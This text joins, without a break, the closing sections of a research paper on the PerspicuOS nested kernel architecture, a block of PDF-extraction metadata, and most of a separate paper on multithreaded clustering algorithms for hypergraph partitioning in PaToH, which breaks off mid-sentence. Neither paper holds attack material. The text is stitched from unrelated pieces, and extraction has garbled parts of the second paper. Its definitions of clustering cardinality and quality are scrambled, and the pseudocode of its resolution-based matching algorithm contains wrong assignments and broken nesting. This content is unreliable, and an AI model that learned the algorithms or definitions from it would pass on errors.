--- **Figure 5.** SSHD Average Bandwidth. **Figure 6.** Apache average bandwidth. --- 6. Future Work There are several directions for future work. First, we plan to investigate methods for removing mediation functions from the TCB. Mediation functions do not need to write to protected memory and could be excluded from the TCB by running them with write-protectations enabled. Second, although the nested kernel provides a sufficient interface to protect data structures, techniques are needed to ensure that policy-enforcing code stores all critical data within the nested kernel. Third, we plan to formally verify PerspicuOS’s design to improve assurance of its correctness. Additionally, we will explore applications of PerspicuOS. For example, moving the memory allocator into the nested kernel could protect the kernel from memory safety attacks that overwrite allocator meta-data. Additionally, we could move the access control functionality into the nested kernel, thereby ensuring that attacks on the operating system kernel cannot subvert its access controls. 7. Related Work The core contributions of this work include a new OS organization, the nested kernel architecture, for providing privilege separation and isolation within a single monolithic kernel, and a unique method for implementing it on commodity hardware with PerspicuOS. **Operating System Organizations.** Several alternative operating system designs provide privilege separation and memory isolation, including microkernels, ExoKernels, and separation kernels. OSes written in type safe languages also provide inherent security improvements \cite{4,9,32}. While these approaches isolate kernel components and mediate access to critical data structures, they completely abandon commodity OS design. **MMU Protections.** The nested kernel architecture isolates the MMU by modifying the outer kernel so that MMU updates can be mediated, and exports an interface similar to those of related efforts including Xen \cite{7}, SVA-OS \cite{13,15,20} and paravirtops \cite{54}. Although the interface is similar, the nested kernel architecture employs different \( \rho \)MMU policies to protect and virtualize the MMU, as well as introduces de-privileging to isolate the nested kernel. SecVisor employs similar MMU policies to enforce kernel code integrity \cite{43} as PerspicuOS; however, SecVisor uses special nested paging hardware support that uses implicit traps on certain hardware events, which is both external to the kernel and has higher costs per invocation than PerspicuOS. **Intra-Kernel Memory Isolation.** SILVER \cite{55} and UCON \cite{56} specify policy frameworks (similar to mandatory access control) to enforce access control policies on internal kernel objects using VMM hardware. SILVER exports an access control service that is used by the operating system to specify principals and object ownership access policies through the memory allocator, which are then enforced by the VMM. In contrast, PerspicuOS uses the x86-64 \( WP \)-bit to provide a memory isolation mechanism on which SILVER access control policies could be overlaid. Nooks \cite{46} provides lightweight protection domains for kernel drivers and modules. Nooks uses the hardware MMU to create protection domains and changes hardware page tables when transferring control between the core kernel and the kernel driver. Although Nooks provides reliability guarantees, it does not consider isolation from malicious entities, and therefore is susceptible to attack. **Compiler Based Intra-Kernel Memory Isolation.** Several previous efforts \cite{10,18} employ software fault isolation (SFI) and control-flow integrity (CFI) to isolate kernel components. These systems utilize heavy weight compiler instrumentation in addition to address translation policies to isolate kernel components. LXFI \cite{29} uses programmer annotations to specify interface policy rules between kernel extensions and the core kernel and inserts run-time checks to enforce these rules. In contrast, PerspicuOS does not require compiler-based enforcement mechanisms, alleviates the need for kernel control-flow integrity, and removes the core kernel from the TCB. **Hypervisor Based Isolation.** Both SVA \cite{15} and HyperSafe \cite{50} employ the MMU and the \( WP \)-bit to prevent privileged system software from making errant changes to page tables. However, these approaches require control flow integrity, and furthermore the HyperSafe work claimed that using the WP approach on a monolithic kernel would be too challenging due to shared code and data pages. Several approaches deploy security monitors to protect and record certain kernel events: each has drawbacks. Several such approaches place the monitor in the same TCB as the untrusted code, leaving them vulnerable to attack \cite{31,37,47}. Other systems, namely Lares \cite{35} and the In-VM monitor SIM \cite{44}, place the monitor in a VMM (using nested paging support) to provide integrity guarantees about the isolation and invocation of the security monitor. These systems suffer from high performance costs \cite{35} or assume integrity of the code region \cite{44}. VMM-based monitors must also address VMM introspection problems: the monitor does not understand the semantics of kernel data structures \cite{19,24}. In PerspicuOS, security monitors are isolated from the monitored system, can be invoked much more efficiently via direct nested kernel operations instead of expensive VMM hypercalls, and completely avoid the VMM introspection problem. KCoFI \cite{14}, SecVisor \cite{43}, and NICKLE \cite{38} provide kernel code integrity. SecVisor and NICKLE also ensure that only authorized code runs in the processor’s privileged mode. PerspicuOS enforces the same policies, but also includes a novel memory isolation mechanism. **8. Conclusion** This paper presents the nested kernel architecture, a new OS organization that provides important security benefits to commodity operating systems that was retrofitted to an existing monolithic kernel. We show that the two nested kernel architecture components, the nested kernel and the outer kernel, can co-exist in the highest hardware protection level in a common address space without compromising the isolation guarantees of the system. The nested kernel architecture can efficiently support useful write-mediation policies, such as write-once and append-only, which OS developers can use to incorporate new security policies with very low performance overheads. More broadly, we expect that the nested kernel architecture can improve OS security by enabling OS developers to incorporate richer security principles like complete mediation, least privilege, and least common mechanism, for selected OS functionality. **Acknowledgments** The authors would like to thank Audrey Dautenhahn for her editorial services, and Maria Kotsifakou, Prakalp Srivastava, and Matthew Hicks for refining our ideas via technical and writing discussions. Our shepherd Peter Druschel and the anonymous reviewers provided valuable feedback that greatly enhanced the quality of this paper. This work was sponsored by ONR via grant number N00014-12-1-0552 and supported in part by ONR via grant number N00014-4-1-0525, MURI via contract number AF Subcontract UCB 00006769, and NSF via grant number CNS 07-09122. References
{"Source-Url": "http://nathandautenhahn.com/downloads/publications/asplos200-dautenhahn.pdf", "len_cl100k_base": 13868, "olmocr-version": "0.1.53", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 53889, "total-output-tokens": 18721, "length": "2e13", "weborganizer": {"__label__adult": 0.0004405975341796875, "__label__art_design": 0.000457763671875, "__label__crime_law": 0.0007109642028808594, "__label__education_jobs": 0.0006251335144042969, "__label__entertainment": 9.79900360107422e-05, "__label__fashion_beauty": 0.00018334388732910156, "__label__finance_business": 0.00042319297790527344, "__label__food_dining": 0.00031495094299316406, "__label__games": 0.0012617111206054688, "__label__hardware": 0.006908416748046875, "__label__health": 0.0004982948303222656, "__label__history": 0.0004031658172607422, "__label__home_hobbies": 0.00013148784637451172, "__label__industrial": 0.0007491111755371094, "__label__literature": 0.00026869773864746094, "__label__politics": 0.0003829002380371094, "__label__religion": 0.00052642822265625, "__label__science_tech": 0.1827392578125, "__label__social_life": 7.152557373046875e-05, "__label__software": 0.0232391357421875, "__label__software_dev": 0.7783203125, "__label__sports_fitness": 0.00022935867309570312, "__label__transportation": 0.0006165504455566406, "__label__travel": 0.00018596649169921875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 79867, 0.03223]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 79867, 0.42289]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 79867, 0.85523]], "google_gemma-3-12b-it_contains_pii": [[0, 4301, false], [4301, 10351, null], [10351, 15766, null], [15766, 21775, null], [21775, 26473, null], [26473, 31653, null], [31653, 35890, null], [35890, 41711, null], [41711, 47473, null], [47473, 53162, null], [53162, 57750, null], [57750, 61622, null], [61622, 67437, null], [67437, 73215, null], [73215, 78869, null], [78869, 79867, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4301, true], [4301, 10351, null], [10351, 15766, null], [15766, 21775, null], [21775, 26473, null], [26473, 31653, null], [31653, 35890, null], [35890, 41711, null], [41711, 47473, null], [47473, 53162, null], [53162, 57750, null], [57750, 61622, null], [61622, 67437, null], [67437, 73215, null], [73215, 78869, null], [78869, 79867, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 79867, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 79867, null]], "pdf_page_numbers": [[0, 4301, 1], [4301, 10351, 2], [10351, 15766, 3], [15766, 21775, 4], [21775, 26473, 5], [26473, 31653, 6], [31653, 35890, 7], [35890, 41711, 8], [41711, 47473, 9], [47473, 53162, 10], [53162, 57750, 11], [57750, 61622, 12], [61622, 67437, 13], [67437, 73215, 14], [73215, 78869, 15], [78869, 79867, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 79867, 0.06742]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
e378cc34cec6b24bf5ed4db1056a83342cd28feb
Multithreaded clustering for multi-level hypergraph partitioning Umit V. Catalyurek, Mehmet Deveci, Kamer Kaya, Bora Uçar To cite this version: Umit V. Catalyurek, Mehmet Deveci, Kamer Kaya, Bora Uçar. Multithreaded clustering for multi-level hypergraph partitioning. 26th IEEE International Parallel and Distributed Processing Symposium, IPDPS 2012, May 2012, Shanghai, China. pp.848–859, 10.1109/IPDPS.2012.81. hal-00763565 HAL Id: hal-00763565 https://inria.hal.science/hal-00763565 Submitted on 19 Dec 2019 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. Multithreaded Clustering for Multi-level Hypergraph Partitioning Ümit V. Çatalyürek, Mehmet Deveci, Kamer Kaya The Ohio State University Dept. of Biomedical Informatics {umit,mdeveci,kamer}@bmi.osu.edu Bora Uçar CNRS and LIP, ENS Lyon Lyon 69364, France bora.ucar@ens-lyon.fr Abstract—Requirements for efficient parallelization of many complex and irregular applications can be cast as a hypergraph partitioning problem. The current-state-of-the art software libraries that provide tool support for the hypergraph partitioning problem are designed and implemented before the game-changing advancements in multi-core computing. Hence, analyzing the structure of those tools for designing multithreaded versions of the algorithms is a crucial task. The most successful partitioning tools are based on the multi-level approach. In this approach, a given hypergraph is coarsened to a much smaller one; a partition is obtained on the smallest hypergraph, and that partition is projected to the original hypergraph while refining it on the intermediate hypergraphs. The coarsening operation corresponds to clustering the vertices of a hypergraph and is the most time consuming task in a multi-level partitioning tool. We present three efficient multithreaded clustering algorithms which are very suited for multi-level partitioners. We compare their performance with that of the ones currently used in today’s hypergraph partitioners. We show on a large number of real-life hypergraphs that our implementations, integrated into a commonly used partitioning library PaToH, achieve good speedups without reducing the clustering quality. Keywords—Multi-level hypergraph partitioning; coarsening; multithreaded clustering algorithms; multicore programming I. INTRODUCTION Hypergraph partitioning is an important problem widely encountered in parallelization of complex and irregular applications from various domains including VLSI design [1], parallel scientific computing [2], [3], sparse matrix reordering [4], static and dynamic load balancing [5], software engineering [6], cryptosystem analysis [7], and database design [8], [9], [10]. Being such an important problem, considerable effort has been put in providing tool support, see hMeTiS [11], MLpart [12], Mondriaan [13], Parkway [14], PaToH [15], and Zoltan [16]. All the tools above follow the multi-level approach. This approach consists of three phases: coarsening, initial partitioning, and uncoarsening. In the coarsening phase, the original hypergraph is reduced to a much smaller hypergraph after a series of coarsening levels. At each level, vertices that are deemed to be similar are grouped to form vertex clusters, and a new hypergraph is formed by unifying a cluster as a single vertex. That is, the clusters become the vertices for the next level. In the initial partitioning phase, the coarsest hypergraph is partitioned. In the uncoarsening phase, the partition found in the second phase is projected back to the original hypergraph where the partition is locally refined on the hypergraphs associated with each coarsening level. The coarsening phase is the most important phase of the multi-level approach. This is for the following three reasons. First, the worst-case running time complexity of this phase is higher than the other two phases (initial partitioning and uncoarsening phases have, in most common implementations, linear worst-case running time complexity). Second, as the uncoarsening level performs local improvements, the quality of a partition is highly affected by the quality of the coarsening phase. For example, given a hypergraph, a coarsening algorithm, a conventional initial partitioning algorithm and a refinement algorithm based on the most common ones, very slight variations on vertex similarity metrics can affect the performance quite significantly (see for example the start of Section 5.1 of [17]). Third, it is usually the case that the better the coarsening, the faster the uncoarsening phase is. Therefore, the coarsening phase also affects the running time of the other phases. Our aim in this paper is to efficiently parallelize the coarsening phase of PaToH, a well-known and commonly used hypergraph partitioning tool. The algorithmic kernel of this phase is a clustering algorithm that marks similar vertices to be coalesced. There are two classes of clustering algorithms in PaToH. The algorithms in the first class allow at most two vertices in a cluster. These algorithms are called matching-based or matching algorithms in short. The algorithms in the second class, called agglomerative algorithms, allow any number of vertices to become together to form a cluster. The most effective clustering algorithms in PaToH are agglomerative ones whereas the fastest ones are matching based. We propose efficient parallelization of these two classes of algorithms (Section III). We report practical experiments with PaToH (and its coarsening phase alone) on a recent multicore architecture (Section IV). Our techniques are easily applicable to some other sequential hypergraph partitioners, since they use the same multilevel approach and have similar data structures. II. BACKGROUND, PROBLEM FORMULATION AND RELATED WORK A. Hypergraph Partitioning A hypergraph $\mathcal{H} = (\mathcal{V}, \mathcal{N})$ is defined as a set of vertices $\mathcal{V}$ and a set of nets (hyperedges) $\mathcal{N}$ among those vertices. A net $n \in \mathcal{N}$ is a subset of vertices, and the vertices in $n$ are called its pins. The size of a net is the number of its pins, and the degree of a vertex is equal to the number of nets that contain it. Graph is a special instance of hypergraph such that each net has size two. We use $\text{pins}[n]$ and $\text{nets}[v]$ to represent the pins of a net $n$, and the set of nets that contain vertex $v$, respectively. Vertices can be associated with weights, denoted with $w[\cdot]$, and nets can be associated with costs, denoted with $c[\cdot]$. A $K$-way partition of a hypergraph $\mathcal{H}$ is denoted as $\Pi = \{V_1, V_2, \ldots, V_K\}$ where - parts are pairwise disjoint, i.e., $V_k \cap V_\ell = \emptyset$ for all $1 \leq k < \ell \leq K$, - each part $V_k$ is a nonempty subset of $\mathcal{V}$, i.e., $V_k \subseteq \mathcal{V}$ and $V_k \neq \emptyset$ for $1 \leq k \leq K$, - union of $K$ parts is equal to $\mathcal{V}$, i.e., $\bigcup_{k=1}^{K} V_k = \mathcal{V}$. In a partition $\Pi$, a net that has at least one pin (vertex) in a part is said to connect that part. The number of parts connected by a net $n$, i.e., connectivity, is denoted as $\lambda_n$. A net $n$ is said to be uncut (internal) if it connects exactly one part (i.e., $\lambda_n = 1$), and cut (external), otherwise (i.e., $\lambda_n > 1$). Let $W_k$ denote the total vertex weight in $V_k$ (i.e., $W_k = \sum_{v \in V_k} w[v]$) and $W_{avg}$ denote the weight of each part when the total vertex weight is equally distributed (i.e., $W_{avg} = (\sum_{v \in \mathcal{V}} w[v]) / K$). If each part $V_k \in \Pi$ satisfies the balance criterion $$W_k \leq W_{avg}(1 + \varepsilon), \quad \text{for } k = 1, 2, \ldots, K$$ we say that $\Pi$ is balanced where $\varepsilon$ represents the maximum allowed imbalance ratio. The set of external nets of a partition $\Pi$ is denoted as $\mathcal{N}_E$. Let $\chi(\Pi)$ denote the cost, i.e., cutsize, of a partition $\Pi$. There are various cutsize definitions [1] such as: $$\chi(\Pi) = \sum_{n \in \mathcal{N}_E} c[n]$$ $$\chi(\Pi) = \sum_{n \in \mathcal{N}} c[n](\lambda_n - 1).$$ In (2) and (3), each cut net $n$ contributes $c[n]$ and $c[n](\lambda_n - 1)$ to the cutsize, respectively. The cutsize metric given in (2) will be referred to here as cut-net metric and the one in (3) will be referred as connectivity metric. Given $\varepsilon$ and an integer $K > 1$, the hypergraph partitioning problem can be defined as the task of finding a balanced partition $\Pi$ with $K$ parts such that $\chi(\Pi)$ is minimized. The hypergraph partitioning problem is NP-hard [1]. B. Clustering algorithms for hypergraph partitioning As said before, there are two classes of clustering algorithms: matching-based ones and agglomerative ones. The matching-based ones put at most two similar vertices in a cluster whereas the agglomerative ones allow any number of similar vertices. There are various similarity metrics—see for example [2], [18], [19]. All these metrics are defined on two adjacent vertices (one of them can be a vertex cluster). Two vertices are adjacent if they share a net, i.e., the vertices $u$ and $v$ are matchable if $\mathcal{N}_{uv} = \text{nets}[u] \cap \text{nets}[v] \neq \emptyset$. In order to find a given vertex $u$’s adjacent vertices, one needs to visit each net $n \in \text{nets}[u]$ and then visit each vertex $v \in \text{pins}[n]$. Therefore, the computational complexity of the clustering algorithms is at least in the order of $\sum_{n \in \mathcal{N}} |\text{pins}[n]|^2$. As mentioned in the introduction, the other two phases of the multi-level approach have a linear time worst case time complexity. As $\sum_{n \in \mathcal{N}} |\text{pins}[n]|^2$ is most likely to be the bottleneck, an effective clustering algorithm’s worst case running time should not pass this limit for the algorithm to be efficient as well. The sequential implementations of the clustering algorithms in PaToH proceed in the following way to have a running time proportional to $\sum_{n \in \mathcal{N}} |\text{pins}[n]|^2$. The vertices are visited in a given (possibly random) order and each vertex $u$, if not clustered yet, is tried to be clustered with the most similar vertex or cluster. In the matching-based ones, the current vertex $u$ if not matched yet, chooses one of its unmatched adjacent vertices according to a criterion. If such a vertex $v$ exists, the matched pair $u$ and $v$ are marked as a cluster of size two. If there is no unmatched adjacent vertex of $u$, then vertex $u$ remains as a singleton cluster. In the agglomerative ones, the current vertex $u$, if not marked to be in a cluster yet, can choose a cluster to join (thus forming a cluster of size at least three), or can create another cluster with one of its unmatched adjacent vertices (thus forming a cluster of size two). Hence in agglomerative clustering, vertex $u$ never remains as a singleton, as long as it is not isolated (i.e., not connected to any net). For the clustering algorithms in this paper, there exists a representative vertex for each cluster. When a vertex $u \in \mathcal{V}$ is put into a cluster, we set $\text{rep}[u]$ to the representative of this group. When a singleton vertex $u$ chooses another one $v$, we choose one as the representative and set $\text{rep}[u]$ and $\text{rep}[v]$ accordingly. For all the algorithms, we assume that $\text{rep}[u]$ is initially null for all $u \in \mathcal{V}$. This will also be true if $u$ remains singleton at the end of the algorithm. Algorithm 1 presents one of the matching-based clustering algorithms that are available in PaToH. In this algorithm, the vertex $u$ (if not matched yet) is matched with currently unmatched neighbor $v$ with the maximum connectivity, where the connectivity refers to the sum of the costs of the common nets. This matching algorithm is called as Heavy Connectivity Matching (HCM) in PaToH [2], and Inner Product Matching (IPM) in Zoltan [20] and Mondriaan [13]. One can have different variations of this algorithm by changing the vertex visit order (line 1) and/or using different scaling schemes while computing the contribution of each net to its pins (line 6). The array `conn[ ]` of size `|V|` is necessary to compute the connectivity of the vertex `u` and all its adjacent vertices in time linearly proportional to the number of adjacent vertices. The operation at line 3 is again for efficiency. It removes the matched vertices from `pins[n]`, hence the next searches on `pins[n]` will take less time. Algorithm 2 presents one of the agglomerative clustering algorithms that are available in PaToH. Similar to the sequential HCM algorithm, vertices are again visited in a given order. If a vertex `u` has already been clustered, it is skipped. However, an unclustered vertex `u` can choose to join an existing cluster, can start a new cluster with a vertex, or stay as a singleton cluster. Therefore, compared to the previous algorithm, all adjacent vertices of the current vertex `u` are considered for selection. In order to avoid building an extremely large cluster (which would cause load balance problem in initial partitioning and refinement phases), we also enforce that weight of a cluster must be smaller than a given value `maxW`. Our experience shows that such restriction is not needed in matching based clustering, since at each level only at most two vertices can be clustered together. In Algorithm 2, we use the total shared net cost (heavy connectivity clustering) as the similarity metric. In practice (and in our experiments), we use the absorption clustering metric (implemented in PaToH) which divides the contribution of each net to the number of its pins. That is, a net `n` contributes `c[n]/|pins[n]|` to the similarity value instead of `c[n]`. This metric favors clustering vertices connected via nets of small sizes. The sequential code in PaToH also divides the overall similarity score between two vertices by the weight of the cluster which will contain `u` (the value `totW` at line 1). Hence, to compare the performance of our multithreaded clustering algorithms with PaToH, we also use this modified similarity metric in our implementations. However, for simplicity, we will continue to use the heavy connectivity clustering metric in the paper. ### C. Metrics We define the metrics of cardinality and quality to compare different clustering methods. The cardinality is defined as the number of clustering decisions taken by an algorithm, i.e., the similarities between each vertex pair which resides in levels. The quality of a clustering is defined as the sum of the number of vertices between two consecutive coarsening in the multi-level framework, this represents the reduction on $C$. **D. Related work** For a given hypergraph $\mathcal{H}=(\mathcal{V}, \mathcal{N})$, let $A$ be the vertex-net incidence matrix, i.e., the rows of $A$ correspond to the vertices of $\mathcal{H}$, and the columns of $A$ correspond to the nets of $\mathcal{H}$ such that $a_{vn} = 1$ iff $v \in \text{pins}[n]$. Consider now the symmetric matrix $M = AA^T - \text{diag}(AA^T)$. The matrix $M$ can be effectively represented by an undirected graph $G(M)$ with $|\mathcal{V}|$ vertices and having an edge of weight $m_{uv}$ between two vertices $u$ and $v$ if $m_{uv} \neq 0$. That is, there is a one-to-one correspondence between the vertices of $\mathcal{H}$ and $G(M)$. As $m_{uv} \neq 0$ iff the vertices $u$ and $v$ of $\mathcal{H}$ are adjacent, the correspondence implies that a matching among the vertices of $\mathcal{H}$ corresponds to a matching on the vertices of $G(M)$. Therefore, various matching algorithms and heuristics for graphs can be used on $G(M)$ to find a matching among the vertices of $\mathcal{H}$. Bisseling and Manne [21] propose a distributed memory, 1/2-approximate algorithm to find weighted matchings in graphs. Building on this work, Çatalyürek et al. [22] present efficient distributed-memory parallel algorithms and scalable implementations. Halappanavar et al. [23] present an efficient shared-memory implementations for computing 1/2-approximate weighted matchings. For maximum cardinality matching problem, in a recent work, Patwary et al. [24] propose a distributed memory, sub-optimal algorithm. There are a number of reasons why we cannot use aforementioned algorithms. First and foremost, storing the graph $G(M)$ requires a large memory. The time required to compute this graph is about as costly as computing a matching in $\mathcal{H}$ in a sequential execution. Second, it is our experience (with the coarsening algorithms within the multi-level partitioner PaToH) that one does not need a maximum weighted matching, nor a maximum cardinality one, nor an approximation guarantee to find helpful coarsening schemes. Third, while matching the vertices of a hypergraph, we sometimes need to avoid matched vertices become too big, or favor vertex clusters with smaller weights (due to multi-level nature of the partitioning algorithm), and vertices that are mostly related via nets of smaller size. These modifications can be incorporated into the graph $G(M)$ by adjusting the edge weights (or by leaving some edges out). This will help reduce the memory requirements of the graph matching based algorithms. However, the computational cost of constructing the graph remains the same. Almost all of the most effective sequential clustering algorithms implemented in PaToH for coarsening purposes has the same worst case time complexity but are much faster in practice. We, therefore, cannot afford building the graph $G(M)$ or its modified versions and call existing graph matching algorithms. Furthermore, agglomerative clustering algorithms cannot be accomplished by using the aforementioned algorithms. We highlight that the matching-based clustering algorithms considered in this paper can be perceived as a graph matching algorithm adjusted to work on an implicit representation of the graph $G(M)$ or its modified versions. However, to the best of our knowledge, there is no immediate parallel graph-matching based algorithm that is analogous to the agglomerative clustering algorithms considered in this work (although variants of agglomerative coarsening for graphs exist, see for example [25] and [26]). As a sanity check, we implemented a modified version of the sequential 1/2-approximation algorithm of Halappanavar et al. [23] which works directly on hypergraphs. In other words, instead of explicitly constructing the graph $G(M)$, adjacencies of vertices are constructed on the fly, like Algorithm 1. We compared the quality and cardinality of this algorithm with that of the greedy sequential matching HCM. The approximation algorithm obtained matchings with better quality by 14% while the cardinalities were the same. However, this good performance comes with a significant execution time overhead, yielding 6.5 times slower execution. When we integrated the 1/2-approximation algorithm into the coarsening phase of PaToH, we observed that better matching quality helps the partitioner to obtain better cutsize. For example, when the partitioner is executed 10 times with random seeds, the average cutsize of 1/2-approximation algorithm is 8% better than the one obtained by using HCM. However, when we compare the minimum of these cutsizes, HCM outperforms the approximation algorithm by 2%. Moreover, the difference between the minimum cut obtained by using HCM with the average cut obtained by using the approximation algorithm is 14% in favor of HCM. After these preliminary experiments, we decided to parallelize HCM and HCC, since they are much faster, and one can obtain better cutsize by using them. III. MULTITHREADED CLUSTERING FOR COARSENING In this section, we will present three novel parallel greedy clustering algorithms. The first two are matching-based and the third one is a greedy agglomerative clustering method. A. Multithreaded matching algorithms To adapt the greedy sequential matching algorithm for multithreaded architectures, we use two different approaches. In the first one, we employ a locking mechanism which prevents inconsistent matching decisions between the threads. In the second approach, we let the algorithm run almost without any modifications and then use a conflict resolution mechanism to create a consistent matching. The lock-based algorithm is given in Algorithm 3. The structure of the algorithm is similar to the sequential one except the lines 2 and 5, where we use the atomic CHECKANDLOCK operation. To lock a vertex $u$, this operation first checks if $u$ is already locked or not. If not, it locks it and returns true. Otherwise, it returns false. Its atomicity guarantees that a locked vertex is never considered for a matching. That is, both the visited vertex $u$ (at line 1) and the adjacent vertex $v$ must not be locked to consider the matching of $u$ and $v$. If they are, and if the similarity of $v$ is bigger than the current best (at line 3), the algorithm keeps $v$ as the best candidate $v^*$. When a better candidate is found, the old one is UNLOCKed to make it available for other threads (line 6), and to construct better matchings in terms of cardinality and quality. As a different approach without a lock mechanism, we modify the sequential code slightly and execute it in a multithreaded environment. If the for loop at line 1 of Algorithm 1 is executed in parallel, different threads may set rep$[u]$ to different values for a vertex $u$. Hence, the rep array will contain inconsistent decisions. To solve this issue, one can make each thread use a private rep array and store all of its matching decisions locally. Then, a consistent matching can be devised from this information in another phase. Another idea is keeping the sequential code (almost) as is, letting the threads create conflicts, and resolving the conflicts later. Our preliminary experiments show that there is not much difference between the performances of these two approaches in terms of the cardinality and the quality. However, the first one requires more memory: one rep array per thread compared to a shared one. Hence, we followed the second idea and use a conflict resolution scheme with $O(|V|)$ complexity. Algorithm 4 shows the pseudocode of our parallel resolution-based algorithm. Algorithm 4: Parallel resolution-based matching **Data:** $\mathcal{H} = (V, \mathcal{N})$, rep for each vertex $u \in V$ in parallel do if rep$[u]$ = null then adj$[u] \leftarrow \{\}$ for each net $n \in \text{nets}[u]$ do for each vertex $v \in \text{pins}[n]$ do if $v \notin$ adj$[u]$ then adj$[u] \leftarrow$ adj$[u] \cup \{v\}$ conn$[v] \leftarrow$ conn$[v] + c[n]$ $v^* \leftarrow u$ conn$^* \leftarrow 0$ for each vertex $v \in$ adj$[u]$ do if conn$[v] >$ conn$^*$ then if CHECKANDLOCK$[v]$ then $v^* \leftarrow$ conn$[v]$ conn$^* \leftarrow$ conn$[v]$ $v^* \leftarrow v$ conn$[v] \leftarrow 0$ if rep$[u] = rep[v] =$ null then rep$[u] \leftarrow v^*$ rep$[v^*] \leftarrow u$ end if end for end for end for end if end for for each vertex $u \in V$ in parallel do $v \leftarrow$ rep$[u]$ if $v \neq$ null and $u \neq$ rep$[v]$ then rep$[u] \leftarrow$ null end if end for for each vertex $u \in V$ in parallel do $v \leftarrow$ rep$[u]$ if $v \neq$ null and $u < v$ then rep$[u] \leftarrow u$ end if end for Our conflict resolution scheme starts at line 5 of Algorithm 4. Note that instead of setting a fixed representative for the matched vertices \( u \) and \( v^* \), we set their rep values to each other. This bidirectional information is then used in our resolution scheme to check if the rep array contains inconsistent information. That is if \( u \neq \text{rep}[\text{rep}[u]] \) for a vertex \( u \), we know that at least two threads matched either \( u \) or \( v \) with different vertices. If this is the case, the resolution scheme acts greedily and aggressively sets \( \text{rep}[u] \) to \text{null} indicating \( u \) will be unmatched. After the first loop at line 5, which is executed in parallel, the rep array will contain the matching decisions consistent with each other. Then, with the last parallel loop, we set the representatives for each matched pair. The proposed resolution scheme is sufficient to obtain a valid matching in the multithreaded setting. However, we slightly modify Algorithm 1 to obtain better matchings. Since each conflict will probably cost a pair, and losing a pair reduces matching cardinality and hence, quality, we desire lesser conflicts. To avoid them, at line 1 of Algorithm 4, we check if a vertex \( v \) adjacent to \( u \) is already matched. If we detect an already matched candidate, we do not consider it as a possible mate for \( u \). Furthermore, at line 2, we again verify if \( u \) and \( v \) are already matched right before matching them. This check is necessary since either of them could have been matched by another thread after the current one starts considering them. B. Multithreaded agglomerative clustering To adapt the sequential agglomerative clustering algorithm to multithreaded setting, we use the same lock-based approach integrated to Algorithm 3. The pseudocode of the parallel agglomerative clustering algorithm is given in Algorithm 5. The algorithm visits the vertices in parallel, and when a thread visits a vertex \( u \), it tries to lock \( u \). If \( u \) is already locked the thread skips \( u \) and visits the next vertex. If \( u \) is not locked but is already a member of a cluster, the thread unlocks \( u \). Since a cluster cannot be the source of a new cluster, this is necessary. On the other hand, if \( u \) is a singleton vertex, the thread continues by computing the similarity values for each adjacent vertex and then traverses the adjacency list \( \text{adj}_u \) along the same lines as the sequential algorithm. The main difference here is the locking request for \( v^* \) (line 1) which is either set to \( v \) if \( v \) is singleton, or to the representative of the cluster that \( v \) resides in. Before considering \( v^* \) as a matching candidate, this lock is necessary. However, if \( v^* \) is already the best candidate, it is not so (since the thread has already grabbed \( v^* \)). When the lock is granted, the thread checks if the adjacent vertex \( v \), which was singleton before, has been assigned to a cluster by another thread. If this is the case, the thread unlocks the representative and continues with the next adjacent vertex. Otherwise, it recomputes the total weight of \( u \) and \( v^* \) (line 3) since new vertices might have been inserted to \( v^* \)’s cluster by other threads. Since insertions can only increase \( w[v^*] \) and \( \text{conn}[v^*] \), we do not need to compare \( \text{conn}[v^*] \) with \( \text{conn}^* \) again. On the other hand, since we cannot construct clusters with large weights, we need to check if \( \text{totW} \) is still smaller than \( \text{maxW} \) (line 4). When the best candidate \( v^* \) is found, we put \( u \) in the cluster \( v^* \) represents and update the rep and w arrays accordingly. Unlike the matching based algorithms, a cluster is allowed to be a candidate more than once throughout the execution. Hence, at the end of the iteration (lines 5 and 6) we unlock all the vertices that are locked during this iteration. C. Implementation Details To obtain lock functionality for the multithreaded clustering algorithms described in the previous section, we use the compare and exchange CPU instruction which exists in x86 and Itanium architectures. We first allocate a lock array of length \(|V|\) and initialize all entries to 0. For each call of the corresponding function in C, \_sync Bool compare and swap, the entry related with the lock request is compared with 0. In case of equality, it is set to 1, and the function returns \text{true}. On the other hand, if the entry is not 0 then it returns \text{false}. To unlock a vertex, we simply set the related entry in the lock array to 0. Although this function provides great support and flexibility for concurrency, our preliminary experiments show that it can also reduce the efficiency of a multithreaded algorithm. To alleviate this, we try reduce the number of calls on this function by adding an if statement before each lock request which helps us to see if the lock is really necessary. We observe significant improvements on the execution times due to these additional if statements. For example, the parallel lock-based matching algorithm described in the previous section should be implemented as in Algorithm 6 to make it much faster. We stress that the if statements at lines 1 and 3 do not change anything in the execution flow. That is if a vertex is not locked, it cannot be also matched since a matched vertex always stays locked. Hence everything that can pass the lock requests (lines 2 and 4) can also pass the previous if statements. However, the opposite is not true. We used 